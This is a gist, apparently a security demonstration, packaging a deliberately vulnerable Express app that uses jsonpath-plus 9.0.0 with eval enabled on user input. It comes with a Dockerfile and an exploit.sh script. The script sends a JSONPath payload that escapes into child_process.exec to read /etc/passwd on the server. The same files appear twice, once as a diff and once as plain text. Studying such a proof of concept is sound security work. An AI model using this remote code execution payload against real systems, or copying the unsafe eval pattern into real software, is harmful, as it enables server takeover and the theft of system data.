pabloopez · November 11, 2024 10:34
diff --git a/Dockerfile b/Dockerfile
 # Use an older version of Node.js
 FROM node:18.0

 # Set the working directory
 WORKDIR /app

 # Copy the package files
 COPY package.json ./

 # Install dependencies (including vulnerable jsonpath-plus version)
 RUN npm install && npm install [email protected]

 # Copy the application source code
 COPY . .

 # Expose the application port
 EXPOSE 3000

 # Start the application
 CMD ["sh", "-c", "npm list jsonpath-plus && node index.js"]

diff --git a/exploit.sh b/exploit.sh
 #!/bin/bash

 curl -X POST http://localhost:3000/query \
 -H "Content-Type: application/json" \
 -d '{"json": {}, "path": "$[(this.constructor.constructor("require(\"child_process\").exec(\"cat /etc/passwd\")")())]"}'
diff --git a/gistfile1.txt b/gistfile1.txt
 // Import necessary modules
 const express = require('express');
 const { JSONPath } = require('jsonpath-plus'); // Using version 9.0.0

 // Create an instance of an Express app
 const app = express();
 app.use(express.json());

 // Endpoint that evaluates JSONPath on provided JSON with unsafe evaluation enabled
 app.post('/query', (req, res) => {
    let debugMessages = [];
    try {
        const json = req.body.json;
        const path = req.body.path;

        debugMessages.push(`Received JSON: ${JSON.stringify(json)}`);
        debugMessages.push(`Received Path: ${path}`);

        // Debug: Print configuration for JSONPath
        const config = {
            json: json,
            path: path,
            eval: true // Allow unsafe evaluation, making it vulnerable
        };
        debugMessages.push(`JSONPath Config: ${JSON.stringify(config)}`);

        // Use JSONPath to evaluate the path on the provided JSON
        let result;
        try {
            result = JSONPath(config);
            debugMessages.push(`JSONPath Evaluation Success: ${JSON.stringify(result)}`);
        } catch (jsonPathError) {
            debugMessages.push(`JSONPath Evaluation Failed: ${jsonPathError.message}`);
            res.status(500).json({ error: `Error evaluating JSONPath: ${jsonPathError.message}`, debug: debugMessages });
            return;
        }

        debugMessages.push(`JSONPath Result: ${JSON.stringify(result)}`);
        res.json({ result, debug: debugMessages });
    } catch (err) {
        debugMessages.push(`Error evaluating JSONPath or executing script: ${err.message}`);
        res.status(500).json({ error: 'Error evaluating JSONPath or executing script', debug: debugMessages });
    }
 });

 // Health check endpoint
 app.get('/health', (req, res) => {
    res.json({ status: 'Healthy' });
 });

 // Start the server
 const port = process.env.PORT || 3000;
 app.listen(port, () => {
    console.log(`Server is running on port ${port}`);
 });
diff --git a/package.json b/package.json
 {
  "name": "vulnerable-node-app",
  "version": "1.0.0",
  "description": "A vulnerable Node.js app for security demonstration purposes",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "dependencies": {
    "express": "^4.17.1",
    "jsonpath-plus": "9.0.0"
  },
  "author": "Your Name",
  "license": "ISC"
 }
	# Use an older version of Node.js
	FROM node:18.0

	# Set the working directory
	WORKDIR /app

	# Copy the package files
	COPY package.json ./

	# Install dependencies (including vulnerable jsonpath-plus version)
	RUN npm install && npm install [email protected]

	# Copy the application source code
	COPY . .

	# Expose the application port
	EXPOSE 3000

	# Start the application
	CMD ["sh", "-c", "npm list jsonpath-plus && node index.js"]
	#!/bin/bash

	curl -X POST http://localhost:3000/query \
	-H "Content-Type: application/json" \
	-d '{"json": {}, "path": "$[(this.constructor.constructor("require(\"child_process\").exec(\"cat /etc/passwd\")")())]"}'
	// Import necessary modules
	const express = require('express');
	const { JSONPath } = require('jsonpath-plus'); // Using version 9.0.0

	// Create an instance of an Express app
	const app = express();
	app.use(express.json());

	// Endpoint that evaluates JSONPath on provided JSON with unsafe evaluation enabled
	app.post('/query', (req, res) => {
	let debugMessages = [];
	try {
	const json = req.body.json;
	const path = req.body.path;

	debugMessages.push(`Received JSON: ${JSON.stringify(json)}`);
	debugMessages.push(`Received Path: ${path}`);

	// Debug: Print configuration for JSONPath
	const config = {
	json: json,
	path: path,
	eval: true // Allow unsafe evaluation, making it vulnerable
	};
	debugMessages.push(`JSONPath Config: ${JSON.stringify(config)}`);

	// Use JSONPath to evaluate the path on the provided JSON
	let result;
	try {
	result = JSONPath(config);
	debugMessages.push(`JSONPath Evaluation Success: ${JSON.stringify(result)}`);
	} catch (jsonPathError) {
	debugMessages.push(`JSONPath Evaluation Failed: ${jsonPathError.message}`);
	res.status(500).json({ error: `Error evaluating JSONPath: ${jsonPathError.message}`, debug: debugMessages });
	return;
	}

	debugMessages.push(`JSONPath Result: ${JSON.stringify(result)}`);
	res.json({ result, debug: debugMessages });
	} catch (err) {
	debugMessages.push(`Error evaluating JSONPath or executing script: ${err.message}`);
	res.status(500).json({ error: 'Error evaluating JSONPath or executing script', debug: debugMessages });
	}
	});

	// Health check endpoint
	app.get('/health', (req, res) => {
	res.json({ status: 'Healthy' });
	});

	// Start the server
	const port = process.env.PORT \|\| 3000;
	app.listen(port, () => {
	console.log(`Server is running on port ${port}`);
	});
	{
	"name": "vulnerable-node-app",
	"version": "1.0.0",
	"description": "A vulnerable Node.js app for security demonstration purposes",
	"main": "index.js",
	"scripts": {
	"start": "node index.js"
	},
	"dependencies": {
	"express": "^4.17.1",
	"jsonpath-plus": "9.0.0"
	},
	"author": "Your Name",
	"license": "ISC"
	}